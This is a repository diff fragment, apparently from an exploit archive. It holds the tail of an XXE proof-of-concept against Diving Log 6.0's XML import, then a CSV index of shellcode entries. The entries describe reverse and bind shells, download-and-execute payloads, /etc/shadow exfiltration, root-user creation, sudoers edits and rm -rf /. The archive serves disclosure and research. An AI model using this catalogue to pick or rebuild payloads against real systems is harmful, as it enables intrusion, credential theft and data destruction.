<divecomputer model='manually added dive'>
|
||||||
|
<depth max='15.0 m' mean='13.37 m' />
|
||||||
|
<surface pressure='1.013 bar' />
|
||||||
|
<sample time='0:00 min' depth='0.0 m' />
|
||||||
|
<sample time='3:00 min' depth='15.0 m' />
|
||||||
|
<sample time='40:00 min' depth='15.0 m' />
|
||||||
|
<sample time='42:00 min' depth='5.0 m' />
|
||||||
|
<sample time='45:00 min' depth='5.0 m' />
|
||||||
|
<sample time='46:00 min' depth='0.0 m' />
|
||||||
|
</divecomputer>
|
||||||
|
</dive>
|
||||||
|
</dives>
|
||||||
|
</divelog>
|
||||||
|
|
||||||
|
==================
|
||||||
|
Additional Attack Vectors:
|
||||||
|
==================
|
||||||
|
I tested and exploited the "subsurface" import option, however MANY other dive log software programs use XML and most are available as Import options in Diving Log 6.0. This XXE injection vulnerability is most likely vulnerable in every import option that utilizes XML for the underlying custom file format(.UDCF and .UDDF, for example).
|
File diff suppressed because it is too large
Load diff
652
files_shellcodes.csv
Normal file
652
files_shellcodes.csv
Normal file
|
@ -0,0 +1,652 @@
|
||||||
|
id,file,description,date,author,type,platform
|
||||||
|
14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
|
||||||
|
13241,shellcodes/aix/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
|
||||||
|
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
|
||||||
|
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
|
||||||
|
13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
|
||||||
|
13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
|
||||||
|
13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
|
||||||
|
13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
|
||||||
|
13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
|
||||||
|
13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86
|
||||||
|
13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
|
||||||
|
13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
|
||||||
|
13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
|
||||||
|
13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
|
||||||
|
13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
|
||||||
|
13256,shellcodes/bsd_x86/13256.c,"BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd_x86
|
||||||
|
13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
|
||||||
|
13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
|
||||||
|
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
|
||||||
|
13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
|
||||||
|
13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
|
||||||
|
13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
|
||||||
|
13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
|
||||||
|
13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86
|
||||||
|
13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
|
||||||
|
13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
|
||||||
|
13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
|
||||||
|
13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
|
||||||
|
13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
|
||||||
|
13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86
|
||||||
|
13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86
|
||||||
|
13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86
|
||||||
|
13274,shellcodes/freebsd_x86/13274.c,"FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes)",2004-09-26,preedator,shellcode,freebsd_x86
|
||||||
|
13275,shellcodes/freebsd_x86/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,shellcode,freebsd_x86
|
||||||
|
13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86
|
||||||
|
13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86
|
||||||
|
13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
|
||||||
|
13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
|
||||||
|
13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
|
||||||
|
13281,shellcodes/generator/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
|
||||||
|
13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
|
||||||
|
13283,shellcodes/generator/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
|
||||||
|
13284,shellcodes/generator/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator
|
||||||
|
13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
|
||||||
|
13286,shellcodes/generator/13286.c,"Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
|
||||||
|
13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,shellcode,generator
|
||||||
|
13289,shellcodes/generator/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
|
||||||
|
13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",shellcode,ios
|
||||||
|
13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
|
||||||
|
13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",shellcode,hardware
|
||||||
|
13293,shellcodes/hardware/13293.txt,"Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
|
||||||
|
13295,shellcodes/hp-ux/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
|
||||||
|
13296,shellcodes/lin_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,lin_x86-64
|
||||||
|
13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
|
||||||
|
13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
|
||||||
|
13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]); Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
|
||||||
|
13300,shellcodes/linux_mips/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_mips
|
||||||
|
13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
|
||||||
|
13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
|
||||||
|
13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
|
||||||
|
13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc
|
||||||
|
13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc
|
||||||
|
13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc
|
||||||
|
13307,shellcodes/lin_x86/13307.c,"Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,lin_x86
|
||||||
|
13308,shellcodes/lin_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)",2009-09-15,XenoMuta,shellcode,lin_x86
|
||||||
|
13309,shellcodes/lin_x86/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,lin_x86
|
||||||
|
13310,shellcodes/lin_x86/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13311,shellcodes/lin_x86/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13312,shellcodes/lin_x86/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13313,shellcodes/lin_x86/13313.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,lin_x86
|
||||||
|
13314,shellcodes/lin_x86/13314.c,"Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13315,shellcodes/lin_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13316,shellcodes/lin_x86/13316.c,"Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,shellcode,lin_x86
|
||||||
|
13317,shellcodes/lin_x86/13317.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13318,shellcodes/lin_x86/13318.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13319,shellcodes/lin_x86/13319.s,"Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13320,shellcodes/lin_x86-64/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,lin_x86-64
|
||||||
|
13321,shellcodes/lin_x86/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,shellcode,lin_x86
|
||||||
|
13322,shellcodes/lin_x86/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,shellcode,lin_x86
|
||||||
|
13323,shellcodes/lin_x86/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,shellcode,lin_x86
|
||||||
|
13324,shellcodes/lin_x86/13324.c,"Linux/x86 - Read /etc/passwd Shellcode (65+ bytes)",2009-02-27,certaindeath,shellcode,lin_x86
|
||||||
|
13325,shellcodes/lin_x86/13325.c,"Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13326,shellcodes/lin_x86/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13327,shellcodes/lin_x86/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator
|
||||||
|
13329,shellcodes/lin_x86/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,lin_x86
|
||||||
|
13330,shellcodes/lin_x86/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,lin_x86
|
||||||
|
13331,shellcodes/lin_x86/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,shellcode,lin_x86
|
||||||
|
13332,shellcodes/lin_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,shellcode,lin_x86
|
||||||
|
13333,shellcodes/lin_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,shellcode,lin_x86
|
||||||
|
13334,shellcodes/lin_x86/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,shellcode,lin_x86
|
||||||
|
13335,shellcodes/lin_x86/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)",2008-09-17,dun,shellcode,lin_x86
|
||||||
|
13336,shellcodes/lin_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",shellcode,lin_x86
|
||||||
|
13337,shellcodes/lin_x86/13337.c,"Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,lin_x86
|
||||||
|
13338,shellcodes/lin_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,shellcode,lin_x86
|
||||||
|
13339,shellcodes/lin_x86/13339.asm,"Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,shellcode,lin_x86
|
||||||
|
13340,shellcodes/lin_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,lin_x86
|
||||||
|
13341,shellcodes/lin_x86/13341.c,"Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,shellcode,lin_x86
|
||||||
|
13342,shellcodes/lin_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,shellcode,lin_x86
|
||||||
|
13343,shellcodes/lin_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,lin_x86
|
||||||
|
13344,shellcodes/lin_x86/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",shellcode,lin_x86
|
||||||
|
13345,shellcodes/lin_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",shellcode,lin_x86
|
||||||
|
13346,shellcodes/lin_x86/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,lin_x86
|
||||||
|
13347,shellcodes/lin_x86/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86
|
||||||
|
13348,shellcodes/lin_x86/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86
|
||||||
|
13349,shellcodes/lin_x86/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86
|
||||||
|
13350,shellcodes/lin_x86/13350.c,"Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86
|
||||||
|
13351,shellcodes/lin_x86/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86
|
||||||
|
13352,shellcodes/lin_x86/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",shellcode,lin_x86
|
||||||
|
13353,shellcodes/lin_x86/13353.c,"Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,lin_x86
|
||||||
|
13354,shellcodes/lin_x86/13354.c,"Linux/x86 - execve /bin/sh Shellcode (22 bytes)",2006-11-16,Revenge,shellcode,lin_x86
|
||||||
|
13355,shellcodes/lin_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,lin_x86
|
||||||
|
13356,shellcodes/lin_x86/13356.c,"Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,lin_x86
|
||||||
|
13357,shellcodes/lin_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,lin_x86
|
||||||
|
13358,shellcodes/lin_x86/13358.c,"Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,lin_x86
|
||||||
|
13359,shellcodes/lin_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,lin_x86
|
||||||
|
13360,shellcodes/lin_x86/13360.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,lin_x86
|
||||||
|
13361,shellcodes/lin_x86/13361.c,"Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,lin_x86
|
||||||
|
13362,shellcodes/lin_x86/13362.c,"Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,lin_x86
|
||||||
|
13363,shellcodes/lin_x86/13363.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,lin_x86
|
||||||
|
13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337/TCP) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
|
||||||
|
13365,shellcodes/lin_x86/13365.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,lin_x86
|
||||||
|
13366,shellcodes/lin_x86/13366.txt,"Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,lin_x86
|
||||||
|
13367,shellcodes/lin_x86/13367.c,"Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,lin_x86
|
||||||
|
13368,shellcodes/lin_x86/13368.c,"Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,lin_x86
|
||||||
|
13369,shellcodes/lin_x86/13369.c,"Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,lin_x86
|
||||||
|
13370,shellcodes/lin_x86/13370.c,"Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,lin_x86
|
||||||
|
13371,shellcodes/lin_x86/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",shellcode,lin_x86
|
||||||
|
13372,shellcodes/lin_x86/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",shellcode,lin_x86
|
||||||
|
13373,shellcodes/lin_x86/13373.c,"Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,lin_x86
|
||||||
|
13374,shellcodes/lin_x86/13374.c,"Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",shellcode,lin_x86
|
||||||
|
13375,shellcodes/lin_x86/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",shellcode,lin_x86
|
||||||
|
13376,shellcodes/lin_x86/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",shellcode,lin_x86
|
||||||
|
13377,shellcodes/lin_x86/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",shellcode,lin_x86
|
||||||
|
13378,shellcodes/lin_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",shellcode,lin_x86
|
||||||
|
13379,shellcodes/lin_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",shellcode,lin_x86
|
||||||
|
13380,shellcodes/lin_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,lin_x86
|
||||||
|
13381,shellcodes/lin_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,lin_x86
|
||||||
|
13382,shellcodes/lin_x86/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,lin_x86
|
||||||
|
13383,shellcodes/lin_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,lin_x86
|
||||||
|
13384,shellcodes/lin_x86/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,lin_x86
|
||||||
|
13385,shellcodes/lin_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13386,shellcodes/lin_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13387,shellcodes/lin_x86/13387.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13388,shellcodes/lin_x86/13388.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13389,shellcodes/lin_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13390,shellcodes/lin_x86/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13391,shellcodes/lin_x86/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13392,shellcodes/lin_x86/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13393,shellcodes/lin_x86/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
